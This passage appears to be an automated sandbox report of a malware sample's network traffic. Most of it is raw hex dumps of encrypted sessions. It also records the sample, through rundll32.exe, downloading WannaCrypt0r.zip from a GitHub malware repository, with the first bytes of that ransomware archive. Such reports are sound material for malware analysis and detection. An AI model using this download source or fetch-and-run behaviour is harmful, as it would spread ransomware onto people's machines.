                                                                                                                                                            2022-09-29 12:44:42 UTC228INData Raw: 2e f0 c0 f6 23 60 dd 4e 60 3e 56 fa 4f 2b 1a ee 56 54 7c fc 44 f8 5f 4c c6 a2 54 62 03 43 e7 b3 93 ae 4d ee 45 3f 5e 5c 69 43 51 f1 aa e4 51 3c 24 03 d0 8d 61 11 a3 98 51 89 30 a2 88 72 40 83 73 e1 6e a2 64 0e e0 59 c4 51 26 07 77 7e e4 12 b7 3d a6 b0 f5 db ae 8b 4a a4 f4 8a 54 f7 21 c1 c6 50 52 4b 74 72 b2 9c 53 ec 46 55 43 09 35 2f 23 0b c2 5b 8f d3 03 82 79 a9 4e 42 b1 78 a5 a7 bb 9e a5 8d d1 8f 97 a8 7d 25 cf ac a6 e2 b7 40 41 7b 95 95 50 89 21 b5 ef ba f2 d7 29 66 d1 f9 37 34 77 1c 74 2a dd c3 ee b8 71 89 fc 19 cf 7f 97 de be f7 41 24 80 12 22 49 88 4c 21 e0 cc 90 c0 46 4e ba 2b de a4 a0 04 b8 44 12 8b 2d c1 59 a0 93 98 0e 95 c3 ea 55 6d e8 cf af 26 0d f7 9b b6 fa 27 af bd 50 ba d2 42 9f 2c 2d 93 74 9b 00 1b cb d1 fd 3d 63 26 a7 15 f0 ea f4 92 bd c7
                                                                                                                                                            Data Ascii: .#`N`>VO+VT|D_LTbCME?^\iCQQ<$aQ0r@sndYQ&w~=JT!PRKtrSFUC5/#[yNBx}%@A{P!)f74wt*qA$"IL!FN+D-YUm&'PB,-t=c&
                                                                                                                                                            2022-09-29 12:44:42 UTC244INData Raw: 5e d6 4a 80 27 ab 96 ed 6e 43 34 3c 9e 0e e2 95 d5 dd c7 92 cf 80 ef 1d 4e 93 48 3d 5b ba cb dc 3f 2f bc b4 5d 1b c5 ea 6c af 2c 19 b1 62 8f 86 c4 fb b1 ee e1 bf 97 31 bd bf 69 ee b8 20 59 4b b1 c3 cb b8 a9 dd b0 aa a5 3b d3 3f 08 9f df b4 5f c3 9a 64 d1 2c 33 00 1c 1f 67 05 e2 81 f9 99 61 ed b6 40 5d 70 a7 d9 5b ca 90 76 ae a4 28 3f 98 d9 fb d8 b0 7c eb d7 24 96 3d 28 da a1 61 1f 41 e3 43 1e 13 1c 61 d4 10 c5 41 c2 26 77 6c 7c 46 cf 6f ea e1 16 27 f2 ae 2d 64 35 97 7a ae b1 32 cc 92 3c a8 2d 85 85 06 36 d5 99 ab 7c 5d 93 bf 08 85 5c d1 c4 7f e0 37 97 ee 30 72 a5 84 1a df 21 b0 66 cf c2 34 1f 49 f7 74 f5 04 da 02 a4 3b 1b 14 6a ee a5 6a 92 c9 b4 50 9a e4 50 7f 1a 72 f4 f0 60 31 37 a1 0c cc d6 ab dd 67 26 dd 26 1c 54 56 ac 08 37 6e 02 5f 67 8c 2c df 49 04
                                                                                                                                                            Data Ascii: ^J'nC4<NH=[?/]l,b1i YK;?_d,3ga@]p[v(?|$=(aACaA&wl|Fo'-d5z2<-6|]\70r!f4It;jjPPr`17g&&TV7n_g,I
                                                                                                                                                            2022-09-29 12:44:42 UTC260INData Raw: aa f0 0d ca 49 da f9 99 4b 56 bb a7 b3 10 15 41 01 d2 af 6d c6 da 67 4f f6 cc 93 f3 33 ee e8 6b c6 7e 8e 72 5c 00 a4 2a 1e d7 23 37 f5 af 85 a5 3e 97 e2 0d cc a7 74 2a 59 33 9b 74 cd 72 f5 e1 56 f4 73 66 67 e3 1f 61 b3 b8 6f 14 3b 6b f7 b4 05 43 ed 0d 23 20 65 d0 69 84 0d 59 6d c6 47 aa cc 8e 4e 70 c0 66 9a 4b 13 34 34 d3 83 f0 b8 7c 2e bf 8e 94 77 3e 25 78 9f 00 67 f3 0a b2 07 3d cf 25 26 47 7a 81 83 a1 50 73 f3 47 44 33 19 fc 0c 56 c3 54 7f aa 5b 3c dc 87 0b 0a a9 38 02 1c f0 e1 08 11 6d b3 1e 2c 71 54 a9 f4 a6 51 df f3 19 fa e1 aa 18 93 32 72 c8 e4 0c 32 bb f4 b4 8a 33 44 e7 dc 1d cd 87 20 b9 8d 1b 8c cf 7f ee 6e ea 7e ff 25 76 c7 77 74 f6 fd 94 55 39 24 e1 fc 6c d9 6a ed 81 a3 19 5f 39 77 24 da ec f7 30 bb 92 e7 6b 45 36 ab c5 af fa 67 04 10 b7 51 1d
                                                                                                                                                            Data Ascii: IKVAmgO3k~r\*#7>t*Y3trVsfgao;kC# eiYmGNpfK44|.w>%xg=%&GzPsGD3VT[<8m,qTQ2r23D n~%vwtU9$lj_9w$0kE6gQ
                                                                                                                                                            2022-09-29 12:44:42 UTC276INData Raw: 25 1f 5e a1 06 2b 66 a9 f7 48 81 b5 01 7d df 1a 0c aa 4c 39 62 c0 9b db 44 3b f0 90 62 c8 9f f1 31 f1 88 a5 a0 4e 15 99 7d 3d 5e 61 eb 32 33 ff 06 4c 23 3b 2b 76 c9 2d 62 12 9d 11 66 36 79 7f db 00 1c 23 6d fe 48 d2 1b ff 6a ad 76 c1 58 2d bf 7f 40 7d 84 d1 45 13 8c 23 3a 11 fc 09 13 f6 0d 02 b6 7e 13 b0 1c 04 d8 b9 bf 32 f9 04 f5 9e 08 e9 47 81 a9 b4 8b 71 80 4b fe c8 c1 4d c5 37 b5 c9 a1 c5 62 82 6f 94 4a 07 05 82 59 fa e3 a1 27 de b6 7d 1f ad d9 69 34 a3 e9 38 6d 59 51 2a 72 4d 31 97 a5 ff 74 d5 d5 91 f1 72 5f a1 1e c4 c8 97 f3 73 4a 7d 96 9c db 11 5f ca 80 1a b3 20 0c d6 da 9e 54 b9 31 6b 06 2e b1 a7 f4 14 c2 c6 64 2b 04 5a d6 9d 58 b6 0b fe ab e0 92 50 ed 61 44 f5 ac 00 91 e0 40 6a fd b1 4b 06 77 d9 db cf 3d bf 13 c8 0b 08 11 55 ab 7a 58 f5 88 c4 d6
                                                                                                                                                            Data Ascii: %^+fH}L9bD;b1N}=^a23L#;+v-bf6y#mHjvX-@}E#:~2GqKM7boJY'}i48mYQ*rM1tr_sJ}_ T1k.d+ZXPaD@jKw=UzX
                                                                                                                                                            2022-09-29 12:44:42 UTC292INData Raw: 6f 4b 26 b6 48 55 3f b0 5b f8 73 55 40 f2 c6 f8 0a 51 4f 4c 32 3c f6 4c d9 41 35 36 7e 17 bb 8b a1 cc 2d f1 4f f1 52 0a f7 a4 69 45 6d c1 5b 40 51 91 c7 23 4f 8d d8 ff 20 d2 f9 92 e2 ed 9b 31 62 6b 1d eb 08 2f ba 40 1b 6e 1f b9 f4 fd ac d7 ef a1 27 44 ed ed 69 66 6c 10 e7 51 5f 7d 25 2f 00 01 57 c0 81 93 e6 ae 5d 9e 93 ff 5e 88 31 cb 2d 13 66 04 b2 cd ea 10 38 6d b3 bb 47 d0 fa 68 10 6a e5 b4 d1 f3 09 53 77 c6 28 7b fe 24 31 ad c6 82 35 cc 6b ec 7b dc 94 5e 3b c3 8d 94 d7 fa 5b 89 07 12 47 75 ee fd b1 3b 25 9b f9 44 14 e3 73 ab 84 2a e4 e4 9c 4b 35 f2 a6 25 f2 fe c3 da 0b 59 7b 28 c0 7f d7 1b b7 7a ae 6a a8 13 c0 dc ec db 2f 11 a8 8b 46 7f c1 64 fc b6 2a aa 0b 10 3c db 7f 9f eb 35 d0 d5 72 ab 93 df dc 25 eb bf 2c 75 2c f3 75 9d 74 b3 32 b0 c4 a6 78 fa 05
                                                                                                                                                            Data Ascii: oK&HU?[sU@QOL2<LA56~-ORiEm[@Q#O 1bk/@n'DiflQ_}%/W]^1-f8mGhjSw({$15k{^;[Gu;%Ds*K5%Y{(zj/Fd*<5r%,u,ut2x
                                                                                                                                                            2022-09-29 12:44:42 UTC308INData Raw: 92 8d 4d 0f 81 9c 2b c3 0f 1e 60 bc 72 87 c2 f1 f5 71 0f 29 69 ca f3 b1 05 cd 66 db 6e d3 dc 21 44 88 cb 8d e5 bb 51 5e 35 36 89 f1 15 7b c2 5f d5 66 33 08 04 a0 a1 cd ea 00 cf 82 74 53 71 ee 61 56 dc 37 2c 20 75 1f 59 55 05 60 d3 d2 af 1d 35 2e e7 65 41 d8 c0 4c af c8 4c 32 2e 19 f5 aa 52 88 fa 01 39 ee bb 29 f5 19 14 61 fc 61 f4 04 34 e4 14 72 49 ef f5 80 52 24 a2 95 fc c9 69 30 21 9f 3e a7 98 ea ed cf 95 df 72 ac 08 b6 1a 1a 65 2c e7 ff 2f 8c 0c 08 59 b4 43 4e 3a 3d 5f 59 2b 3e 06 78 ed e5 2d 83 5b 1f cc ac 50 03 c0 d2 3d 9b 35 e1 54 a4 4f 97 3a a5 1a de 4e 38 02 49 a0 63 16 de b8 6f 57 50 08 3c b2 11 01 e3 56 1a 86 d9 a4 21 54 2b 1e 2f e5 f6 9b 5e b2 1c 05 e1 c6 6b 4a a1 4a 4b 38 30 44 21 41 d5 72 1f 4a af bc bd a8 c5 f0 2e c4 b4 5e 2a 0d 0b a1 5b d1
                                                                                                                                                            Data Ascii: M+`rq)ifn!DQ^56{_f3tSqaV7, uYU`5.eALL2.R9)aa4rIR$i0!>re,/YCN:=_Y+>x-[P=5TO:N8IcoWP<V!T+/^kJJK80D!ArJ.^*[
                                                                                                                                                            2022-09-29 12:44:42 UTC324INData Raw: 84 5e 6b ad 9e dc 39 9d 38 6f 59 04 11 4d 51 38 44 da f5 2a 43 0e f0 1a 26 4c ab 42 a9 52 4a c9 45 fc 3b 14 70 16 63 17 10 6f 0d f7 c2 3d 73 44 bd 89 a0 78 f9 91 3e 11 74 fc a4 d0 48 db 4b ee b3 3e a7 8e 51 79 69 aa a9 b3 fb e8 1e cf a2 a7 eb 2d 9a 7b 83 d4 b8 a9 0b 1d 7e b5 0a 5d 65 c6 f2 65 4b 07 55 22 9b ba e1 0f d6 19 1f 88 ab 12 54 38 00 7a 5f d5 f8 9f 6b 01 44 6a 1b fa f6 93 c1 d9 4c 7a f5 1f ec f7 29 b6 16 dd 24 a4 a6 1f c5 3f 6e f3 7c 93 59 1a 96 89 5f 59 2d 6c c6 e5 bc 3c 61 34 4f 41 d2 f1 d0 49 c4 95 03 64 53 3f 5f a7 8f 1d ad ed 8f 00 4a 2f d2 04 15 4d 6c e0 99 0e 53 0d 39 24 78 a7 64 4c 00 2c 6a 7b fc aa 67 7b 5f 6e bc ba 70 c7 0c 18 7b 57 48 6e 74 07 f4 a2 d4 ee 06 e1 0a 80 06 b9 9b 5f a7 79 0a eb ed 5a 86 1e 25 f4 ca d2 70 0c 40 67 e2 fc bf
                                                                                                                                                            Data Ascii: ^k98oYMQ8D*C&LBRJE;pco=sDx>tHK>Qyi-{~]eeKU"T8z_kDjLz)$?n|Y_Y-l<a4OAIdS?_J/MlS9$xdL,j{g{_np{WHnt_yZ%p@g
                                                                                                                                                            2022-09-29 12:44:42 UTC340INData Raw: 22 1e d3 c7 13 95 1f f2 12 6a a9 7e be 2e d7 e9 4a 4d 35 d9 36 8b 35 fd e1 09 6c d2 19 43 19 38 06 7e ad bd 50 39 41 9a a5 e5 7d d5 d3 d7 8b 8b d2 50 9a 44 73 4c 1b 71 54 55 9c 61 e2 50 c5 95 69 0c 6c 74 fb b5 74 cc e2 4e fb 7e 4c 58 7b 3b b7 99 b3 29 51 e6 45 58 40 e7 06 6d 3c e3 f4 73 42 77 53 e6 54 45 16 bc 45 8f f9 0d fa 0b 6a df e8 18 28 1a 36 2c 13 ba 09 76 f2 57 6d 7c 34 af 84 c9 be 94 f5 7d 7d 08 9e 37 50 04 29 9e e1 5f e6 4b 1e 80 eb af db ce 7d 72 ee 70 59 c6 63 e2 f3 5c 21 b3 f6 12 8e 52 a3 2c 54 79 1f ac 5f a6 14 87 69 16 73 d9 fa ab c9 d0 32 29 f1 72 72 77 5a 5f fd 64 91 01 a7 7a 50 13 dc 27 54 e9 d3 2b a7 8e 32 4b d6 b7 86 c7 40 ad d2 0e 77 01 68 ab 13 58 08 23 43 70 e4 e5 f6 70 9c e6 92 72 fa 66 01 3c 3f cf 6e 5a 43 6d 42 d4 49 61 03 b1 8c
                                                                                                                                                            Data Ascii: "j~.JM565lC8~P9A}PDsLqTUaPilttN~LX{;)QEX@m<sBwSTEEj(6,vWm|4}}7P)_K}rpYc\!R,Ty_is2)rrwZ_dzP'T+2K@whX#Cpprf<?nZCmBIa
                                                                                                                                                            2022-09-29 12:44:42 UTC356INData Raw: 52 35 d1 8e e4 ab 1b e0 4c e2 5e 21 77 79 13 c6 01 94 cc d5 79 f8 8b 4a da d5 7c c9 f7 25 ff 7c 81 56 e7 68 60 fb cc e4 76 71 69 be 72 03 d9 fb cd 69 a5 dc 74 ae a8 97 17 b0 77 f7 18 85 54 b7 db fb 9b 55 e0 bc 20 d2 8e 30 87 5d 63 42 22 a2 6f 17 ab 6a 13 ef 69 30 18 46 37 01 5d 76 08 3e 59 fa 27 90 2b 66 e5 43 d1 aa cc 83 d0 2d 38 29 dc 78 a4 23 b1 79 f8 ae 7c 8a b0 63 18 c7 d4 a3 e2 d8 a9 68 cd 63 2c ab 8a 0f fd 79 ea e3 e5 e3 06 bf c6 f4 72 41 6b 17 e7 65 3c d4 7c c1 1e 52 be 48 e3 35 7c b7 5e 7c b2 9b 1b 2b 8e 22 ad 92 99 66 89 d3 12 80 b4 8b 3f d4 f2 c1 f1 e3 8e 4c 85 a3 32 8e a7 4a 62 7e 37 e9 14 12 d8 8b 10 63 bc 00 c1 5f 36 f2 f8 9c a6 e5 b0 e4 1d 8e fe d2 17 31 cf 6f 99 cc cf be 4f e6 30 ed e5 0d 6b bc b1 bb 12 f1 52 89 9a 9f 05 a1 1f f0 da 2e b0
                                                                                                                                                            Data Ascii: R5L^!wyyJ|%|Vh`vqiritwTU 0]cB"oji0F7]v>Y'+fC-8)x#y|chc,yrAke<|RH5|^|+"f?L2Jb~7c_61oO0kR.
                                                                                                                                                            2022-09-29 12:44:42 UTC372INData Raw: f9 e8 4f e7 36 b0 55 32 38 31 a5 17 a7 d8 45 bc 06 28 bc b4 5f e5 ce aa 58 3f 31 0b 48 ca 07 70 fa fe 44 3c 11 ce e2 53 21 92 01 7e 17 42 46 d8 ac 49 a0 42 0d 4d a1 3d 45 c5 7e 0c 9a ba 4c d1 9f 16 1c 97 c6 75 90 e4 01 b7 f6 fe ff d6 fb 64 76 36 50 c2 40 3b fa 2e 26 64 ff 2d 2b b5 84 a7 39 7b b8 b4 a2 1c f5 7d a0 57 b0 d7 fe 7a c5 5e 2a 45 d0 f0 34 14 e6 de d2 be 76 ee 37 24 3b 03 c2 68 09 ba 78 b7 8a 46 b6 32 64 f9 7c b4 38 26 f6 12 5d e3 a7 61 84 85 dc f6 04 61 d7 2c a8 e5 2a f6 df 93 b0 61 9f e3 44 b3 28 f9 29 39 84 0c 64 7d 7f 0f 4c 20 62 f5 13 54 fe ec 15 06 26 0a 8a 06 f6 af 55 d9 d4 03 fd d5 a4 dd 6d 81 6a 4f a3 1c b3 dd 41 33 c0 5d 46 cb 36 d2 6d 68 39 d7 7e a8 38 04 7e 33 75 06 a1 50 83 36 d5 6f 28 8c b9 22 58 12 4e dc 97 ca 44 d9 61 7a 37 27 bd
                                                                                                                                                            Data Ascii: O6U281E(_X?1HpD<S!~BFIBM=E~Ludv6P@;.&d-+9{}Wz^*E4v7$;hxF2d|8&]aa,*aD()9d}L bT&UmjOA3]F6mh9~8~3uP6o("XNDaz7'
                                                                                                                                                            2022-09-29 12:44:42 UTC388INData Raw: ff 00 3f 2f 78 26 0f cc 24 4e ab db d0 58 6d 23 9d 4f c0 aa ba 72 84 87 4d 31 6b 36 23 71 4c a3 c8 b8 2c 6b 2e 79 61 f6 97 68 dd 9e e2 ca b4 b6 eb fe 89 c6 9d 4e f5 4e ce 3d 15 1d 7a a7 16 e7 ad 9e dc 66 20 7c 96 d1 15 f6 cb 19 43 6a ea c8 b0 33 9b 14 ef 64 82 0e 5a 94 57 b3 8d 19 1c 3e 48 4d c9 5e 88 aa 8b 1d 96 d7 9a 40 ad 6c 95 ab a3 ce 3e b2 1d 00 9d 2b f4 3b 0b 0b bf 0a e4 8e 51 9d 31 65 d4 59 b5 27 aa 59 eb fe f7 71 cc 81 59 a1 9a d5 af f2 51 af 45 14 ab 68 46 ff 57 fa 15 b6 7d bf 27 20 f5 03 af c1 ba 9e e1 f6 e8 3f dd 7d 05 fe 08 e6 f9 33 b1 5e bc 37 17 18 0b 71 81 6f 37 de 8b 1a 6a f7 72 c8 4f 33 6e 4a cd 17 07 f3 dc 8a a1 bb 28 77 5b e4 de d2 9f af dd 0b 76 91 9b b8 e4 02 b4 f1 01 81 22 1a 1e ac 21 ee 8e e8 05 27 e6 5f 63 42 d8 f8 a5 9b 46 35 ee
                                                                                                                                                            Data Ascii: ?/x&$NXm#OrM1k6#qL,k.yahNN=zf |Cj3dZW>HM^@l>+;Q1eY'YqYQEhFW}' ?}3^7qo7jrO3nJ(w[v"!'_cBF5
                                                                                                                                                            2022-09-29 12:44:42 UTC397INData Raw: 89 d9 04 7b 1a 72 5f 70 e3 b9 d5 f4 a1 e0 04 fd 95 77 63 91 53 e4 07 43 2b 28 85 21 97 46 c6 4e 21 82 14 4c 3a af 50 52 7b ed 80 ef ab ad a4 42 8e e0 fb c5 cc ff 0f b5 56 59 aa 74 3e 4e 4b 8b c1 a5 63 71 55 98 97 e1 ad 42 09 81 13 e8 a0 2c 1f b1 fd 02 2c 91 d3 9a fd 45 25 05 f5 3a b0 b2 d0 85 bf 9a 7d 81 22 e3 dc ee 3f 7d c1 4e c2 96 88 ae f6 b7 c9 ca 38 5b a5 c4 49 e8 d0 88 31 d7 7f 83 20 46 34 c9 c5 c6 63 f8 10 de 16 e2 b0 76 4e eb 90 e5 04 67 52 df 26 ae 47 23 d0 61 26 b4 60 f0 9a 52 00 8f bd 23 9f 09 38 74 16 b8 56 c2 d9 2a 02 42 cd 0c b4 9d ba 3d 01 5e 73 f8 c5 38 09 bd c7 8e bb 45 60 fa 4b af 5a 35 a5 89 e0 30 af c6 61 19 96 c4 7a 5a ef cd 4c da b2 87 4d dd 35 bf 42 5d fc de 42 e1 71 df 14 05 6b ff 2c f8 84 cc 43 1c ce 06 50 3f dd ba 0d 2c 81 44 20
                                                                                                                                                            Data Ascii: {r_pwcSC+(!FN!L:PR{BVYt>NKcqUB,,E%:}"?}N8[I1 F4cvNgR&G#a&`R#8tV*B=^s8E`KZ50azZLM5B]Bqk,CP?,D


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            50192.168.2.649733140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:58 UTC4121OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            51140.82.121.4443192.168.2.649733C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:59 UTC4121INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:59 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:59 UTC4122INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            52192.168.2.649734185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:59 UTC4124OUTGET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            53185.199.110.133443192.168.2.649734C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:59 UTC4124INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 3477754
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "f2d2308d5c9c4012fb553c82b7938a4339a5db5e022f0a058ece1b06d8a727b6"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0809:67C0:101C7CA:1115ED1:6335934B
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:59 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6920-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455500.511232,VS0,VE275
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 5553fb0182583824aeea67fc7747f266f9454b3e
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:59 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:44:59 UTC4125INData Raw: 50 4b 03 04 14 00 01 00 08 00 ac a3 ad 4a aa fc 22 40 3e 10 35 00 00 a0 35 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 61 6e 6e 61 43 72 79 70 74 30 72 2e 65 78 65 6f 0f db 68 af 01 aa 98 b9 37 e0 93 e8 38 9b 1c 5d 92 7d 1d 81 21 e7 ab 1c 27 cd f4 c9 34 aa 90 bb 64 6c d1 0e 57 d5 03 fa a7 d3 a2 dc 6e 89 67 e9 31 78 19 3b 1f 1d 3a d2 b0 d0 24 57 d4 e1 c6 b3 29 40 d4 13 5d 74 20 b1 b5 85 73 bf 49 ef af a4 c9 4a 92 ab c7 42 0c 3a 9a 7c 98 66 63 4a 0d b6 d9 48 74 53 83 cb 7d 19 58 00 15 50 65 b6 b2 30 8c 14 06 ae e7 66 35 55 df f2 16 2f 88 d0 5e 40 78 9b 4f 9d 09 80 69 94 b2 d3 ca 12 63 f2 d8 fe d2 3a 6e 6f f0 89 ce 22 6d df 96 4f c5 24 c8 8c 8c 8d 2e 85 cc 02 e0 3c 1c fc 48 1b df 66 24 a3 96 9b 30 a0 a8 47 81 f7 56 19 44 83 a0 79 e6 99 0e 57 6e e9 01
                                                                                                                                                            Data Ascii: PKJ"@>55Endermanch@WannaCrypt0r.exeoh78]}!'4dlWng1x;:$W)@]t sIJB:|fcJHtS}XPe0f5U/^@xOic:no"mO$.<Hf$0GVDyWn
                                                                                                                                                            2022-09-29 12:44:59 UTC4126INData Raw: 91 f8 c1 77 dc 6b 6d b2 2f 09 2e b8 0a ce 32 a8 88 cf 1e 7e 8f ce b6 d4 d0 df 58 c6 fe 47 46 8d 5e 84 d0 1e ca 7f a4 1a 15 4d bb 03 60 a3 3f 1a 45 ca ca 6a 20 6b 7d 58 65 5a e5 1b c7 59 31 24 91 53 1f 77 27 f1 b4 66 fc 10 21 39 75 03 ec 5e f2 8f 52 1e 26 c4 45 29 b1 c7 1c 80 79 c6 a8 93 75 d6 71 68 d3 c3 f4 8b 4a cd af 65 73 f1 47 72 25 c6 d4 26 6b db b4 62 3d 09 46 3a 82 b9 35 32 aa b1 30 4b 40 4c 1a 7a c4 a0 68 b2 17 04 ac bd 81 99 6c ea 0a 9b c2 1f 58 12 a5 17 f5 81 13 cc e6 8a 9e 43 c8 e9 3b 86 4a 79 fb f0 a9 10 c5 5d bd 55 dc 70 df bb 48 eb 5c e2 0b 7f 79 e8 41 b4 0e 12 c4 b4 e2 5c db e8 9e 21 48 fc a0 99 9d e8 bd 4d 5d d8 ae 0a 6f fd 08 09 0b 07 82 80 f8 10 91 6d 86 0f 24 15 15 e9 cc 5a ca c1 9f 61 38 b0 b3 43 36 40 1a 6c ed a0 f7 53 ea 0b ce 8b dd
                                                                                                                                                            Data Ascii: wkm/.2~XGF^M`?Ej k}XeZY1$Sw'f!9u^R&E)yuqhJesGr%&kb=F:520K@LzhlXC;Jy]UpH\yA\!HM]om$Za8C6@lS
                                                                                                                                                            2022-09-29 12:44:59 UTC4127INData Raw: 69 a7 34 58 c8 26 c9 45 fd 9b d7 12 19 4c ab 25 7c 39 96 5a 5f ef 33 68 66 e1 15 40 2c 93 bd c2 ef 05 68 3b fd 3d 1a f1 5a a0 42 0d 7b 7e 82 d4 85 bb 56 32 bf 93 f1 d4 62 af 6b 16 73 61 9b c1 78 fb 53 95 ce 27 0e e5 88 05 a1 38 a0 a0 e6 e0 f1 85 a4 2e f0 b8 9d ce f0 88 e1 09 b2 62 bd a9 13 d5 67 f2 4d e4 28 c0 35 f1 fb 27 e9 24 e3 dd 50 7f e4 e1 0a d8 50 95 24 ea d2 d7 93 76 3a 0f bf 55 e4 5b 79 ef 96 aa fc fe 9f f7 f4 5c 01 86 e9 e0 59 cb 0b 05 f3 b3 85 f4 09 b9 37 bc 7f 36 48 4c de f6 79 63 48 9c d8 b1 83 37 68 65 a3 1f 08 bb 37 39 ca 5b 82 9c 1e fa d5 46 99 69 fa 88 70 e9 f6 da 58 93 9a 36 b3 ce e7 fe 78 b9 2c ca bf 07 96 63 73 cc e7 ab d7 ce 0c 1b 80 53 bf 28 74 65 7e f5 e0 fc 21 33 ce 4e d2 03 b5 9f 58 8f 3c 49 f8 c4 ba ca e7 5c d6 e3 4b ba 1e 62 f6
                                                                                                                                                            Data Ascii: i4X&EL%|9Z_3hf@,h;=ZB{~V2bksaxS'8.bgM(5'$PP$v:U[y\Y76HLycH7he79[FipX6x,csS(te~!3NX<I\Kb
                                                                                                                                                            2022-09-29 12:44:59 UTC4129INData Raw: a1 1e ee 3e 04 80 cf b7 6b 88 54 63 cc 38 af 0f b1 83 ad 99 0a 42 d3 46 05 e2 f5 0f f2 2e cb 25 eb 1a a9 f9 50 af 2d 51 d8 19 2c cd 70 b2 0e 22 86 c0 ab 96 ec 3d 8b de 58 6d 9c e5 cc 0d 35 7b f5 22 ec 74 fc 39 92 07 02 8a 3d 8a 13 51 22 2b 0f 77 0e 85 7e eb 06 c4 1f a8 bb 61 90 c1 9a b6 95 51 62 72 aa 95 27 1a b3 71 d3 ec 7f 88 01 33 a2 3c e5 c4 25 70 8b 57 e8 ad c8 38 15 30 dc 4c 36 25 a8 f8 74 be 29 61 c3 1b b8 3c fa 79 51 f2 33 cc 94 87 a1 c2 f9 88 63 ae ae 57 4b 7e 6e 85 0e a0 d4 66 74 b4 4d 2e a1 3f 59 06 29 59 8e c0 0b e3 71 19 b2 72 5a 91 12 b0 6e 5c af 21 54 df d0 51 31 84 5d 55 08 41 c9 03 e6 6c 6e 27 f1 7c 17 df aa d9 21 45 21 73 52 3f 58 cf 3c 14 56 79 f8 0a f1 9a 86 81 d6 2f 75 69 a6 9d 22 12 50 cf 02 12 bd a6 0c 95 5c a2 18 e1 60 49 f2 ea 52
